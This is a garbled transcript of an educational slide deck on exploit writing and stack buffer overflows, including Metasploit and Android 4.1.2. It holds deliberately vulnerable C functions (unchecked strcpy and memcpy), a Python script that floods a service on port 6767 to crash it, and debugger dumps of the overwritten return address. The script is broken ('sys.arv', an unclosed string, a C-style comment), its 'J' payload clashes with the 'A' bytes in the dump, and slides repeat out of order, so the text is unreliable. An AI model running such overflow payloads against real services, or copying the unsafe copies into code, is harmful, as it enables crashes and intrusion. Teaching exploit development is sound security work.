exploit research
DESCRIPTION
Exploit ResearchTRANSCRIPT
Metasploit Framework
READY TO ROLL
PRESENTED BY: JASKARAN SINGH
Android 4.1.2 (Linux 3.3) Exploitation
Exploit Writing◦ Windows Assembly Language
◦ Linux Assembly Language
◦ Networking Basics
◦ Socket programming
◦ Python/Ruby/Perl/C/C++/…
Memcpy Buffer Overflow Exploit
ARG2
ARG1
RET
EBP-old
Local variables
High Memory
Low Memory
SP (Stack Pointer)
BP (Base Pointer / Frame Pointer)
Return Address
Arguments
Str (pointer to a string)
Return Address
EBP-old (Previous Base Pointer)
Buffer[0] … Buffer[7]
var_a
(a) (b)
void test(char *str) { char buffer[12];int var_a; strcpy (buffer, str); } int main() {char *str = “Larger than 12 bytes”; test (str); }
Str (pointer to a string)
Return Address
EBP-old (Previous Base Pointer)
Buffer[0] … Buffer[7]
var_a
(a) (b)
void test(char *str) { char buffer[12];int var_a; strcpy (buffer, str); } int main() {char *str = “Larger than 12 bytes”; test (str); }
void test(char *str) { char buffer[12];int var_a; strcpy (buffer, str); } int main() {char *str = “Larger than 12 bytes”; test (str); }
char a[3]
a[0] a[1] a[2]
E X P L O I T
a = “EXPLOIT”
a[0] a[1] a[2]
Overwritten memory locations
Vulnerable Code
//listening on port 6767
int vul_func(char *input)
{
char buffer[256];
memcpy(buffer, input, 1024);
return 1;
}
Vulnerable Code
Exploit Code
Exploit Code#!/usr/bin/python
import socket, syssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.connect((sys.arv[1], 6767)) //argument passed is IP address
buffer = “J*2000
sock.send(buffer)
sock.close()
Crash…
Crash…
Debugger
After Attack
Memory…
ARG2
ARG1
RET
EBP-old
Local var1
41414141
41414141
41414141
41414141
41414141
41414141
4141414141414141414141414141414141414141
EIP
Stack
Successful Exploitation
PAYLOAD
PAYLOAD
4A4A4A4A
4A4A4A4A
4A4A4A4A
AABBCC08AABBCC08
AABBCC04
AABBCC00
EIP